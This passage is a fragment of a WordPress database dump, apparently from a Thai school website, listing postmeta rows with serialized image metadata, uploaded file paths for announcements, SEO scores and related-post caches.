(13608, 5958, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/07/090762-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"090762-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"090762-01-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"090762-01-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"090762-01-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"090762-01-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13609, 5959, '_wp_attached_file', '2019/07/090762-01-1.png'),
(13610, 5959, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:23:\"2019/07/090762-01-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"090762-01-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"090762-01-1-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"090762-01-1-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"090762-01-1-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"090762-01-1-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13611, 5960, '_wp_attached_file', '2019/07/090762-01-2.png'),
(13612, 5960, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:23:\"2019/07/090762-01-2.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"090762-01-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"090762-01-2-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"090762-01-2-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"090762-01-2-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"090762-01-2-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13613, 5957, '_thumbnail_id', '5963'),
(13617, 5957, '_hide_featured', NULL),
(13618, 5957, '_yoast_wpseo_content_score', '30'),
(13619, 5957, '_yoast_wpseo_primary_category', '31'),
(13620, 5957, '_wpas_done_all', '1'),
(13627, 5962, '_edit_lock', '1568452368:14'),
(13628, 5962, '_edit_last', '14'),
(13629, 5963, '_wp_attached_file', '2019/07/66205799_850511245325065_892295179619270656_n.jpg'),
(13630, 5963, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:960;s:4:\"file\";s:57:\"2019/07/66205799_850511245325065_892295179619270656_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:57:\"66205799_850511245325065_892295179619270656_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:57:\"66205799_850511245325065_892295179619270656_n-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:57:\"66205799_850511245325065_892295179619270656_n-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:57:\"66205799_850511245325065_892295179619270656_n-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13631, 5962, '_thumbnail_id', '5960'),
(13635, 5962, '_hide_featured', NULL),
(13636, 5962, '_yoast_wpseo_content_score', '30'),
(13637, 5962, '_yoast_wpseo_primary_category', '31'),
(13638, 5962, '_wpas_done_all', '1'),
(13649, 5962, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575398707;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5948;}i:1;a:1:{s:2:\"id\";i:6316;}i:2;a:1:{s:2:\"id\";i:3975;}}}}'),
(13650, 5965, '_edit_lock', '1568452235:14'),
(13651, 5965, '_edit_last', '14'),
(13652, 5966, '_wp_attached_file', '2019/07/090762-02ประกาศรับสมัครครูจ้าง-62.pdf'),
(13656, 5965, '_hide_featured', NULL),
(13657, 5965, '_yoast_wpseo_content_score', '60'),
(13658, 5965, '_yoast_wpseo_primary_category', '3'),
(13659, 5965, '_wpas_done_all', '1'),
(13663, 5969, '_edit_lock', '1568452379:14'),
(13664, 5969, '_edit_last', '14'),
(13665, 5970, '_wp_attached_file', '2019/07/090762-03.pdf'),
(13669, 5969, '_hide_featured', NULL),
(13670, 5969, '_yoast_wpseo_content_score', '60'),
(13671, 5969, '_yoast_wpseo_primary_category', '3'),
(13672, 5969, '_wpas_done_all', '1'),
(13675, 5965, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575211706;s:7:\"payload\";a:0:{}}}'),
(13676, 5969, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575546923;s:7:\"payload\";a:0:{}}}'),
(13677, 5957, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575626164;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6078;}i:1;a:1:{s:2:\"id\";i:5604;}i:2;a:1:{s:2:\"id\";i:5197;}}}}'),
(13678, 5973, '_edit_lock', '1568452534:14'),
(13679, 5973, '_edit_last', '14'),
(13680, 5974, '_wp_attached_file', '2019/07/120762-ประกาศรายชื่อผู้มีสิทธิสอบ-จนท.หลักสูตร.pdf'),
(13684, 5973, '_hide_featured', NULL),
(13685, 5973, '_yoast_wpseo_content_score', '60'),
(13686, 5973, '_yoast_wpseo_primary_category', '3'),
(13687, 5973, '_wpas_done_all', '1'),
(13690, 5973, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575708807;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4139;}i:1;a:1:{s:2:\"id\";i:6008;}i:2;a:1:{s:2:\"id\";i:5906;}}}}'),
(13693, 5976, '_edit_lock', '1568452401:14'),
(13694, 5976, '_edit_last', '14'),
(13695, 5977, '_wp_attached_file', '2019/07/120762คำสั่งเวรยามเพิ่มเติม.pdf'),
(13699, 5976, '_hide_featured', NULL),
(13700, 5976, '_yoast_wpseo_content_score', '60'),
(13701, 5976, '_yoast_wpseo_primary_category', '3'),
(13702, 5976, '_wpas_done_all', '1'),
(13705, 5976, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575481031;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6008;}i:1;a:1:{s:2:\"id\";i:5906;}i:2;a:1:{s:2:\"id\";i:6259;}}}}'),
(13706, 5979, '_edit_lock', '1568452438:14'),
(13707, 5979, '_edit_last', '14'),
(13708, 5980, '_wp_attached_file', '2019/07/120762-06.png'),
(13709, 5980, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/07/120762-06.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"120762-06-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"120762-06-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"120762-06-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"120762-06-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"120762-06-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13710, 5979, '_thumbnail_id', '5980'),
(13714, 5979, '_hide_featured', NULL),
(13715, 5979, '_yoast_wpseo_content_score', '30'),
(13716, 5979, '_yoast_wpseo_primary_category', '31'),
(13717, 5979, '_wpas_done_all', '1'),
(13722, 5982, '_edit_lock', '1568452495:14'),
(13723, 5982, '_edit_last', '14'),
(13724, 5983, '_wp_attached_file', '2019/07/120762-05.png'),
(13725, 5983, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/07/120762-05.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"120762-05-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"120762-05-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"120762-05-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"120762-05-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"120762-05-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13726, 5982, '_thumbnail_id', '5983'),
(13730, 5982, '_hide_featured', NULL),
(13731, 5982, '_yoast_wpseo_content_score', '30'),
(13732, 5982, '_yoast_wpseo_primary_category', '31'),
(13733, 5982, '_wpas_done_all', '1'),
(13742, 5985, '_edit_lock', '1568452518:14'),
(13743, 5985, '_edit_last', '14'),
(13744, 5986, '_wp_attached_file', '2019/07/120762-04.png'),
(13745, 5986, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/07/120762-04.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"120762-04-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"120762-04-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"120762-04-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"120762-04-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"120762-04-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13746, 5985, '_thumbnail_id', '5986'),
(13750, 5985, '_hide_featured', NULL),
(13751, 5985, '_yoast_wpseo_content_score', '30'),
(13752, 5985, '_yoast_wpseo_primary_category', '31'),
(13753, 5985, '_wpas_done_all', '1'),
(13758, 5988, '_edit_lock', '1568452526:14'),
(13759, 5988, '_edit_last', '14'),
(13760, 5989, '_wp_attached_file', '2019/07/120762-03.png'),
(13761, 5989, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/07/120762-03.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"120762-03-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"120762-03-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"120762-03-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"120762-03-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"120762-03-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13762, 5988, '_thumbnail_id', '5989'),
(13766, 5988, '_hide_featured', NULL),
(13767, 5988, '_yoast_wpseo_content_score', '30'),
(13768, 5988, '_yoast_wpseo_primary_category', '31'),
(13769, 5988, '_wpas_done_all', '1'),
(13776, 5991, '_edit_lock', '1568452554:14'),
(13777, 5991, '_edit_last', '14'),
(13778, 5992, '_wp_attached_file', '2019/07/120762-02.png'),
(13779, 5992, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/07/120762-02.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"120762-02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"120762-02-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"120762-02-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"120762-02-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"120762-02-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13780, 5991, '_thumbnail_id', '5992'),
(13784, 5991, '_hide_featured', NULL),
(13785, 5991, '_yoast_wpseo_content_score', '30'),
(13786, 5991, '_yoast_wpseo_primary_category', '31'),
(13787, 5991, '_wpas_done_all', '1'),
(13794, 5994, '_edit_lock', '1568452586:14'),
(13795, 5994, '_edit_last', '14'),
(13796, 5995, '_wp_attached_file', '2019/07/120762-01.png'),
(13797, 5995, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/07/120762-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"120762-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"120762-01-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"120762-01-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"120762-01-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"120762-01-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13798, 5994, '_thumbnail_id', '5995'),
(13802, 5994, '_hide_featured', NULL),
(13803, 5994, '_yoast_wpseo_content_score', '30'),
(13804, 5994, '_yoast_wpseo_primary_category', '31'),
(13805, 5994, '_wpas_done_all', '1'),
(13810, 5979, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575571396;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4687;}i:1;a:1:{s:2:\"id\";i:4098;}i:2;a:1:{s:2:\"id\";i:4026;}}}}'),
(13811, 5988, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575565061;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5985;}i:1;a:1:{s:2:\"id\";i:5994;}i:2;a:1:{s:2:\"id\";i:5769;}}}}'),
(13812, 5985, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575748278;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5988;}i:1;a:1:{s:2:\"id\";i:5994;}i:2;a:1:{s:2:\"id\";i:5769;}}}}'),
(13813, 5991, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575721463;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5385;}i:1;a:1:{s:2:\"id\";i:4154;}i:2;a:1:{s:2:\"id\";i:4869;}}}}'),
(13814, 5994, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575622540;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5733;}i:1;a:1:{s:2:\"id\";i:6154;}i:2;a:1:{s:2:\"id\";i:5865;}}}}'),
(13815, 5982, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574594005;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4746;}i:1;a:1:{s:2:\"id\";i:4182;}i:2;a:1:{s:2:\"id\";i:5294;}}}}'),
(13816, 6002, '_edit_lock', '1568452795:14'),
(13817, 6002, '_edit_last', '14'),
(13818, 6003, '_wp_attached_file', '2019/07/300762-ประกาศครูภาษาไทย.pdf'),
(13822, 6002, '_hide_featured', NULL),
(13823, 6002, '_yoast_wpseo_content_score', '60'),
(13824, 6002, '_yoast_wpseo_primary_category', '3'),
(13825, 6002, '_wpas_done_all', '1'),
(13826, 6005, '_edit_lock', '1568452810:14'),
(13827, 6005, '_edit_last', '14'),
(13828, 6006, '_wp_attached_file', '2019/07/300762-ประกาศเจ้าหน้าที่.pdf'),
(13829, 6002, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575654193;s:7:\"payload\";a:0:{}}}'),
(13833, 6005, '_hide_featured', NULL),
(13834, 6005, '_yoast_wpseo_content_score', '60'),
(13835, 6005, '_yoast_wpseo_primary_category', '3'),
(13836, 6005, '_wpas_done_all', '1'),
(13837, 6005, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575582923;s:7:\"payload\";a:0:{}}}'),
(13838, 6008, '_edit_lock', '1568452823:14'),
(13839, 6009, '_wp_attached_file', '2019/07/310762-timeline_20190731_082416.jpg'),
(13840, 6009, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:911;s:6:\"height\";i:1280;s:4:\"file\";s:43:\"2019/07/310762-timeline_20190731_082416.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:43:\"310762-timeline_20190731_082416-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:43:\"310762-timeline_20190731_082416-214x300.jpg\";s:5:\"width\";i:214;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:44:\"310762-timeline_20190731_082416-768x1079.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1079;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:44:\"310762-timeline_20190731_082416-729x1024.jpg\";s:5:\"width\";i:729;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:43:\"310762-timeline_20190731_082416-214x300.jpg\";s:5:\"width\";i:214;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13841, 6010, '_wp_attached_file', '2019/07/310762-timeline_20190731_082410.jpg'),
(13842, 6010, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:886;s:6:\"height\";i:1280;s:4:\"file\";s:43:\"2019/07/310762-timeline_20190731_082410.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:43:\"310762-timeline_20190731_082410-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:43:\"310762-timeline_20190731_082410-208x300.jpg\";s:5:\"width\";i:208;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:44:\"310762-timeline_20190731_082410-768x1110.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:44:\"310762-timeline_20190731_082410-709x1024.jpg\";s:5:\"width\";i:709;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:43:\"310762-timeline_20190731_082410-208x300.jpg\";s:5:\"width\";i:208;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"c